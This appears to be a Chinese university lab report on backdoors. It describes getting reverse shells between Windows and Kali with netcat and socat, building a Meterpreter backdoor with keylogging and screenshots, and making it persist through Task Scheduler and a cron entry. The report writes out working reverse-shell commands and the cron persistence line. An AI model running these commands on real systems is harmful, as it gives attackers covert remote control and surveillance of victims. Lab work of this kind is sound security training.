20145228《網絡對抗》 後門原理與實踐

實驗內容

•利用netcat和socat獲取靶機shell，並實現任務計劃啓動；

•使用msf-meterpreter生成可執行後門文件獲取靶機shell，並進行一些命令操做，如查看ip、截屏、記錄鍵盤輸入、獲取ruby交互界面、進程遷移、安裝服務等

基礎問題回答

一、如何啓動後門？

Windows
在控制面板-管理工具-任務計劃程序中添加任務，

linux中設置cron

二、如何防止被其餘人安裝後門程序？

防火牆和防病毒軟件必須處於打開狀態，定時清理垃圾軟件和惡意廣告，按期進行殺毒軟件全盤掃描。

三、Meterpreter有哪些給你映像深入的功能？

記錄鍵盤輸入抓取以及攝像頭拍攝功能，很強的監視功能。

四、例舉你能想到的一個後門進入到你係統中的可能方式？

瀏覽網頁時，點擊彈出的廣告下載程序；下載軟件時，自動捆綁下載了其餘惡意程序。

實驗過程

使用netcat獲取主機操做Shell，cron啓動

·首先保證虛擬機與主機之間能PING通。

·而後下載ncat與socat到windows與linux裏（linux自帶ncat）

（1）windows獲取linux的shell

·windows開啓監聽端口：

·kali發起鏈接請求：

·Windows得到Linux的Shell

•在windows上打開cmd，並經過ncat開放端口5228

•在linux上反彈鏈接win：nc 192.168.184.128 5228 -e /bin/sh

（2）Linux得到Windows的Shell

•在linux下設置監聽端口：nc -l -p 5228

•在windows下請求鏈接：ncat 192.168.184.128 5228 -e cmd.exe

•在linux下輸入ipconfig查看主機IP：

ncat傳輸文件

•windows系統使用ncat.exe -lv 1452 > 5228.exe監聽準備接受文件

•kali系統使用ncat -nv 172.30.3.151 1452 <20145228來發送指定文件

使用socat獲取主機操做Shell

（1）kali上用socat tcp-listen:5228把cmd綁定到端口5228

•同時用socat tcp-l:5228 system:bash,pty,stderr反彈鏈接

（2）windows使用socat readline tcp:172.30.1.251 5228開啓監聽

•使用ifconfig檢測

meterpreter 生成後門程序

•使用msfconsole命令開啓msf進行設置

•監聽開始，在windows中運行以前的後門程序能夠成功控制遠程shell。

meterpreter信息蒐集

•查看系統版本信息

•對靶機進行截圖

•記錄鍵盤輸入

•安裝爲系統服務

設置後門自動啓動

（1）Windows
•在控制面板-管理工具-任務計劃程序中添加任務，編輯觸發器等

（2）linux

cron啓動

•kali下終端使用crontab -e修改配置文件

在最後一行後加入* * * * * /bin/ncat 172.30.1.154 5228 -e /bin/sh

*號表明時間

實驗感悟

作完這個實驗後，瞭解到了後門程序的植入以及運行方式，使咱們在之後的生活中有着防範後門的意識，具備極大的積極做用。